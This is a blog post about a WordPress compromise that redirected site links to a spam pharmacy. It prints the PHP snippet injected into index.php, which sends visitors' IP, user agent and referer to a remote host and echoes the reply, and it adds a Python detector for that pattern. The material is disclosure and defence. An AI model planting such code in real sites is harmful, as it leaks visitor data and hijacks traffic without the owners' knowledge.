WordPress Hacked

It’s not what you think. This time we’ve discovered what appears to be an ongoing server-level hack (it looks to date back to before July 2010) that targeted WordPress sites. What seems to happen is that any link on the WordPress-based site is compromised by a redirect request; in this case it went to a Canadian-based Viagra shop called MedShop-247.com (not running WP, by the way).

Here’s the PHP code that was injected into the top of the WordPress core index.php file.


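<?php
// Sends the visitor's IP address, user agent and referer to the remote server.
$url = "http://doc.health-drugshop.com/TDS/request.php?ip=".$_SERVER['REMOTE_ADDR']."&useragent=".urlencode($_SERVER['HTTP_USER_AGENT'])."&referer=".urlencode($_SERVER["HTTP_REFERER"]);
$answer = file_get_contents($url);
// Outputs whatever the server returned unless the reply contains "noredirect".
if (strpos($answer,"noredirect") === false) {
    echo $answer;
}
?>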

Removing this inserted code seems to do the trick. Web hosts should probably pay closer attention when they see servers under attack during “standard” DoS attacks. Things like this can easily sneak in when no one is reviewing the logs. And unfortunately WordPress itself doesn’t notice it, presumably because the code runs prior to any WordPress code. So again, while WordPress wasn’t to blame here, it certainly can feel the pain, depending on your server’s security and the vigilance of the web host provider.
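
A check a host or site owner could run over index.php for code of the shape shown above, as an added example that is not part of the original post. The function name, the regular expressions and the placeholder host in the sample are this example's own, and it is a heuristic for this one pattern rather than a general malware scanner.

```python
import re

# Visitor attributes the injected snippet forwards to the remote server.
VISITOR = re.compile(
    r"\$_SERVER\s*\[\s*['\"](?:REMOTE_ADDR|HTTP_USER_AGENT|HTTP_REFERER)['\"]\s*\]")
# $var = "http://..." ... ;   (one PHP statement, may span several lines)
URL_ASSIGN = re.compile(r"(\$\w+)\s*=\s*[\"']https?://[^;]*;", re.I)
# $resp = file_get_contents($var)
FETCH = re.compile(r"(\$\w+)\s*=\s*@?file_get_contents\s*\(\s*(\$\w+)\s*\)", re.I)
ECHO = re.compile(r"\b(?:echo|print)\s+(\$\w+)", re.I)
BOOTSTRAP = "wp-blog-header.php"  # loaded by the stock WordPress index.php


def find_remote_echo(php_source):
    """Return findings for 'fetch a visitor-keyed URL, echo the reply' code."""
    url_vars = {m.group(1) for m in URL_ASSIGN.finditer(php_source)
                if VISITOR.search(m.group(0))}
    echoed = {m.group(1) for m in ECHO.finditer(php_source)}
    boot_at = php_source.find(BOOTSTRAP)
    findings = []
    for m in FETCH.finditer(php_source):
        resp_var, arg_var = m.group(1), m.group(2)
        if arg_var in url_vars and resp_var in echoed:
            findings.append({
                "line": php_source.count("\n", 0, m.start()) + 1,
                "response_var": resp_var,
                # True when the fetch runs before WordPress itself is loaded.
                "before_bootstrap": boot_at == -1 or m.start() < boot_at,
            })
    return findings


# Constructed samples: a stock-style index.php, and the same file with a
# block of the shape shown above prepended (placeholder host, not the real one).
CLEAN = """<?php
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
"""
INFECTED = """<?php
$url = "http://tds.example.invalid/request.php?ip=".$_SERVER['REMOTE_ADDR']
  ."&referer=".urlencode($_SERVER["HTTP_REFERER"]);
$answer = file_get_contents($url);
if (strpos($answer,"noredirect") === false) {
echo $answer;
}
?>
""" + CLEAN

if __name__ == "__main__":
    for name, src in (("clean", CLEAN), ("infected", INFECTED)):
        print(name, find_remote_echo(src))
```

Run on a schedule against the site's entry-point files, a non-empty result with before_bootstrap set is the case described above, where the code executes before any WordPress code is loaded.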